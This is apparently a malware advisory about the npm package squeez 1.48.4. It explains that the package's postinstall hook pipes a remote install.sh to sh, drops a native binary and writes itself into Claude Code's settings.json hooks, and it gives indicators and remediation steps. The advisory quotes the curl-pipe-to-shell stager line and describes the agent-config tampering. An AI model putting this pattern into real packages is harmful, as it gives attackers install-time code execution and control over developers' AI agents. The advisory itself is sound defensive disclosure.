⛔ Malware Advisory Detected 2026-09-28
Confirmed malicious. codelake independently detected this at 2026-09-28 — Independently detected in codelake's npm scan feed (pkgbehavior install-hook + shell-download-exec + agent-config-tamper) and confirmed on flag-safe static review. Already published in ossf/malicious-packages as MAL-2026-13458 — this advisory corroborates and links that record; not a codelake first-catch.. Also documented publicly: MAL-2026-13458 (OSV / ossf-malicious-packages). Static code review of the published npm tarball; no execution.
Advisory · CLR-2026-3059

squeez — an npm package whose postinstall curl|sh-drops a remote script and native binary, then rewrites Claude Code hooks

[email protected] runs a postinstall (node install.js) that executes curl -fsSL <repo>/install.sh | sh, downloads a platform-specific native binary from GitHub releases into ~/.claude/squeez/bin, and calls squeez setup --host=claude-code to register itself into Claude Code's settings.json hooks. Install-time remote code execution. Already tracked in ossf/malicious-packages as MAL-2026-13458.

CriticalConfirmed maliciousOSV MAL-2026-13458
What it is & how it works

squeez ships as an npm package whose package.json declares "postinstall": "node install.js" — so the code below runs automatically on npm install/npx.

Remote drop + execute. install.js executes curl -fsSL https://raw.githubusercontent.com/<owner>/squeez/main/install.sh | sh and, via Node's https, downloads a platform-specific native binary (squeez-linux-x86_64 / squeez-macos-universal / squeez-windows-x86_64.exe) from the project's GitHub releases into ~/.claude/squeez/bin/squeez. The install-time payload is fetched from a remote source the package controls — the npm tarball itself is only the stager.

Agent-surface tampering. It then runs <binary> setup --host=claude-code, writing itself into Claude Code's settings.json hooks / statusline — persistent control over the developer's AI agent.

How we found it

[email protected] was pulled into codelake's npm scan feed and flagged by pkgbehavior with a stack of install-time signals: install-hook-runs-flagged-script (postinstall), shell-download-exec (curl|sh LOLBin stager), agent-config-tamper (Claude Code hooks), child-spawn-dynamic, dynamic-require, and a 4-way high-risk capability-combination (network + filesystem + process + agent-config).

Confirmed on flag-safe static review of the published tarball — reading install.js's download/exec and hook-registration paths only, no execution, no live callback. Cross-checked against ossf/malicious-packages, which already carries this package as MAL-2026-13458.

Affected versions

Analysed: 1.48.4. The malicious postinstall dropper is core to the package; the OSV malicious-packages record covers the package as malicious.

Timeline
2026-09-28
codelake detection
Flagged in the npm scan feed (pkgbehavior install-hook + shell-download-exec + agent-config-tamper); confirmed on flag-safe static review; corroborated against OSV MAL-2026-13458.
Indicators of compromise
📦npm package: [email protected]
⚙️Install hook: "postinstall": "node install.js"
🌐Remote stager: curl -fsSL <github-repo>/main/install.sh | sh
⬇️Native binary from GitHub releases → ~/.claude/squeez/bin/squeez
🧠Agent tamper: squeez setup --host=claude-code writes Claude Code settings.json hooks
🔖OSV: MAL-2026-13458 (ossf/malicious-packages)
Remediation
#ActionPriority
1 Uninstall squeez and delete ~/.claude/squeez; audit Claude Code settings.json for injected hooks/statusline entries. Immediate
2 Treat any machine that ran the postinstall as exposed to whatever the remote install.sh/binary delivered; rotate developer credentials reachable from that host. Immediate
3 Pin/audit dependencies and run installs with --ignore-scripts where feasible. Advised

Verified by static code review of the published npm tarball; no execution, no live callback.

The npm tarball is the stager; the executed payload is fetched at install time from a remote GitHub repo/releases.

Corroborated by ossf/malicious-packages MAL-2026-13458.